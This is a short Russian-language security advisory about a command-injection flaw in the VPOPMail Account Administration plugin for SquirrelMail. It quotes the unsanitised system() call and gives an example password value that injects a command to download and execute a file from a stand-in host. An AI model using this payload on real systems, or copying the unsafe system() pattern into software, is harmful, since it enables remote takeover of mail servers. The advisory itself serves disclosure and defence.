Security Lab

Выполнение произвольных команд в 'VPOPMail Account Administration'

Дата публикации:18.03.2003
Всего просмотров:1029
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: VPOPMail Account Administration 0.x
Описание: Уязвимость в проверке правильности ввода обнаружена в плагине 'VPOPMail Account Administration' для SquirrelMail и vpopmail. Удаленный пользователь может выполнять произвольные команды на системе.

Программа не фильтрует пароль пользователя в сценарии 'vpopmail.php', перед его принятием в запросе system():

system("$vpasswd $username $pwd");
В результате удаленный пользователь может представить специально обработанное значение для пароля, которое содержит команды оболочки, которые будут выполнены на целевом сервере. Пример:
 
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;
Команды будут выполнены с привилегиями процесса 'vpopmail'.

Уязвимость обнаружена в VPOPMail Account Administration (squirrel mail) 0.9.7

Ссылки: VPOPMail Account Administration (squirrel mail) version 0.9.7